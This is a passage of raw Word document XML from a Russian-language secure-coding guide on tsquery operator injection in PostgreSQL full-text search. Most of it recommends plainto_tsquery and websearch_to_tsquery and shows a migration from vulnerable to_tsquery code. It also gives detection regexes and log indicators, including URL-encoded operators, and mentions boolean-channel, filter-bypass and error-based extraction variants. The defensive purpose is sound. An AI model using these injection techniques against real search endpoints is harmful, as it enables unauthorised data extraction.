          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery\s*\([^)]*:\w+\)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + проверка, что параметр не build_tsquery output.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запросы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с literals содержащими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от endpoint-ов, где должен быть простой search.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Database-логи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syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от user-search endpoint — индикатор Variant C или попытки разведки parser-а.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 access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query parameter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%26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded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%7C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded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%21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded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:%2A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL-encoded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Функция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доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2008).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 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2018). Никакие фиксы не закрывают этот класс — operator-parsing является design-feature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3.15.1 LIKE wildcards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельная семантическая поверхность с тем же типом mismatch (значение vs семантика символов).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3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — безопасная альтернатива, migration path.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3.15.4 tsquery как error-based канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — расширение Variant C — full extraction через syntax error.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Variant A создаёт boolean-channel через override match-логики.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Обход фильтров</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-operator используется как обвод WHERE-фильтрации, что параллельно WAF-bypass.</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«Text Search Functions and Operators» — https://www.postgresql.org/docs/current/textsearch-controls.html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«Querying a Table» / tsquery — https://www.postgresql.org/docs/current/datatype-textsearch.html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«Full Text Search» / Введение — https://www.postgresql.org/docs/current/textsearch.html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Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (parser source) — https://github.com/postgres/postgres/blob/master/src/backend/utils/adt/tsquery.c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OWASP: «Server-Side Request Forgery Prevention Cheat Sheet» (родственный класс — semantic injection в external parsers) — https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html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SQLAlchemy Docs: «Full Text Search» — https://docs.sqlalchemy.org/en/20/dialects/postgresql.html#full-text-search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15.3 websearch_to_tsquery / plainto_tsquery — безопасные альтернативы</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PostgreSQL предоставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">три безопасные альтернативы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функции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(3.15.2), которые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не парсят user-input как operator-язык</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или парсят его в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">predictable, restricted subset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`plainto_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — treats input as plain text. Все operators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&lt;-&gt;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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">игнорируются</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (заменяются на whitespace), термины AND-аются. Полностью безопасна для прямой передачи user-input.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`phraseto_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же, что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но термины должны идти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">подряд</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FOLLOWED BY вместо AND). Используется для phrase search.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`websearch_to_tsquery(text)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с PG 11) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">поддерживает Google-style syntax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в restricted subset: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"phrase"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (double quotes для phrase search), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-term</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (исключение), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (case-insensitive OR). Любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax-invalid input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не падает с ERROR (как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а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">игнорируется gracefully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это критично для безопасности (нет syntax-error канала 3.15.4).</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не подраздел про уязвимость</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это подраздел про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">защитный pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: migration с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на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закрывает все варианты 3.15.2 и 3.15.4. Подраздел нужен в категории, чтобы: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зафиксировать сравнение функций (что выбирать в каком случае)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показать migration pattern для существующих эндпоинтов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объяснить, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`plainto_tsquery` vs `websearch_to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это не «one or the other», а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разные search-UX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защищённый код (canonical pattern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/articles.py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Query,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@router.get("/articles/search")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search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1, max_length=200),</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Безопасный шаблон: websearch_to_tsquery для user-input</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title,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               ts_rank(search_vector, websearch_to_tsquery('english', :q)) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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websearch_to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY rank DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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{"q": q})</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User может писать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin &amp; superuser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парсит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">два литеральных слова</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 ignored), не как boolean operator. Пользователь может написать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"exact phrase"</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поддерживается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как FOLLOWED BY. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — исключение. Любой syntax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silently ignored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнительная таблица функций tsquery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Функция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User-input как operators</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Syntax error на bad input</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Поддерживает phrase</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PG-версия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Use case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to_tsquery(q)</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парсит все operators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ERROR + leak</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (3.15.2/3.15.4)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(через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>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Server-side built tsquery</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plainto_tsquery(q)</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игнорирует все operators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(safe)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(всегда AND)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Простой keyword search</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phraseto_tsquery(q)</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игнорирует все operators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(safe)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(всегда phrase)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Phrase-only search</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websearch_to_tsquery(q)</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restricted subset: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OR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(silently ignored)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(через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Google-style user search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">рекомендуемый default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для user-facing search-endpoints (PG 11+).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 для legacy (PG 8.3–10) или когда не нужны phrases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration pattern: с `to_tsquery` на `websearch_to_tsquery`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Было (уязвимо, см. 3.15.2):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text("""</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to_tsquery('english', :q)</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Стало (безопасно):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
